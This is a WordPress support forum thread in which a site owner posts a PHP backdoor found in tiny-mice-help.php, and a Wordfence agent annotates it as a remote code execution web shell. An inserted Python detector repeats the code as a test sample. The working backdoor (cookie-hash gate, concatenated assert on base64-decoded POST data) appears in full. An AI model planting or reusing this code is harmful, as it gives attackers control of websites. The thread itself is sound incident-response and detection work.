• Resolved Jan444

    (@ign2009)



    Hi guys, I’d like to draw your attention to this mysterious file that has popped up in some of my sites and I suspect is a virus.

    The file is called tiny-mice-help.php and is located (created now mid-November) in /wp-includes/js/tiny-mice/ and it goes like so:

    if((md5(@$_COOKIE[ssid])=="beef1e01ad41668d609d778ad3ba496b")){error_reporting(0);@array_map("as"."sert",(array) base64_decode($_POST[x]));} if((@$_COOKIE[wprid]=="59857777ad9b3")){die(md5('ok'));}

    Let me know if this could be something.
    Thanks!

Viewing 3 replies - 1 through 3 (of 3 total)
  • Plugin Support wfdave

    (@wfdave)

    Hi @ign2009,

    You should immediately remove that file and run further scans on your website.

    Looking at the code, it is a backdoor that allows attackers to execute code on your server remotely.

    //only allows the attacker who uses a special token for the ssid cookie
    if ((md5(@$_COOKIE[ssid])=="beef1e01ad41668d609d778ad3ba496b")) {
        error_reporting(0);
    
        //remotely executes code from $_POST
        @array_map("as"."sert", (array) base64_decode($_POST[x]));
    }
    
    //probably an easy way for the attacker to see if your website has the backdoor installed or not
    if ((@$_COOKIE[wprid]=="59857777ad9b3")) {
        die(md5('ok'));
    }

    Dave
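
The traits annotated in the reply above (a cookie token gate, a function name split by string concatenation, decoded request data, a fixed presence reply) can be checked for statically across a site's PHP files. This is an added example, not part of the thread and not Wordfence's scanner; the rule names, function names and the harmless sample are assumptions made for illustration.

```python
import re
from pathlib import Path

Q = r"[\"']"  # either PHP quote character
# Functions that run PHP or shell code handed to them.
DANGEROUS = {"assert", "eval", "create_function", "system", "exec", "passthru", "shell_exec"}
# Quoted fragments joined with the PHP dot operator, e.g. "as"."sert".
CONCAT = re.compile(rf"(?:{Q}[A-Za-z_]*{Q}\s*\.\s*)+{Q}[A-Za-z_]*{Q}")
RULES = {
    # md5() of a cookie compared with a hard-coded 32-hex digest (token gate)
    "cookie_md5_gate": re.compile(
        rf"md5\s*\(\s*@?\$_COOKIE\b[^)]*\)\s*===?\s*{Q}[0-9a-f]{{32}}{Q}", re.I),
    # request data passed straight into base64_decode()
    "decoded_request_input": re.compile(
        r"base64_decode\s*\(\s*@?\$_(?:POST|GET|REQUEST|COOKIE)\b", re.I),
    # fixed die(md5('...')) reply that only confirms the file is present
    "presence_probe": re.compile(rf"die\s*\(\s*md5\s*\(\s*{Q}[^\"']*{Q}\s*\)\s*\)", re.I),
}

def split_function_names(source):
    """Dangerous function names that were hidden by string concatenation."""
    names = set()
    for match in CONCAT.finditer(source):
        joined = "".join(re.findall(rf"{Q}([A-Za-z_]*){Q}", match.group(0))).lower()
        if joined in DANGEROUS:
            names.add(joined)
    return names

def scan_php(source):
    """Sorted indicator names found in one PHP source string."""
    hits = [name for name, rule in RULES.items() if rule.search(source)]
    hits += ["split_name:" + name for name in split_function_names(source)]
    return sorted(hits)

def scan_tree(root):
    """Map each .php file under root that has indicators to its indicator list."""
    report = {}
    for path in sorted(Path(root).rglob("*.php")):
        hits = scan_php(path.read_text(errors="replace"))
        if hits:
            report[str(path)] = hits
    return report

# The file contents quoted in the first post, and a constructed harmless file.
THREAD_SAMPLE = r'''if((md5(@$_COOKIE[ssid])=="beef1e01ad41668d609d778ad3ba496b")){error_reporting(0);@array_map("as"."sert",(array) base64_decode($_POST[x]));} if((@$_COOKIE[wprid]=="59857777ad9b3")){die(md5('ok'));}'''
BENIGN_SAMPLE = r'''<?php $label = "as" . "set"; echo md5($_POST["name"]); ?>'''

if __name__ == "__main__":
    print(scan_php(THREAD_SAMPLE), scan_php(BENIGN_SAMPLE))
```

A file that trips several of these rules at once is worth reading by hand; a single hit on its own (for example `base64_decode` on request data) also occurs in legitimate code.
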

    Jan444

    (@ign2009)

    Hi Dave, many thanks. I was all day dealing with this. I performed scans with Wordfence, removed offending files (some were newly created with strange characters, others were modified with eval injections), and cleaned old themes and plugins.

    Re-installed WordPress, removed old installs, updated all plugins and themes everywhere, updated WordPress everywhere, removed lots of unused themes.

    Now the scans are showing all is fine.

    I’ll wait and see but I’d say the situation is under control as no other “suspicious file modification” warning has popped up for the last few hours, which was the way I noticed the problem.

    Thanks for your great plugin!
    Cheers,
    Jan

    Plugin Support wfdave

    (@wfdave)

    That’s great! You’ve definitely taken all the necessary precautions to secure your site.

    Please let us know if there’s any new suspicious activity on your site here.

    Thanks!
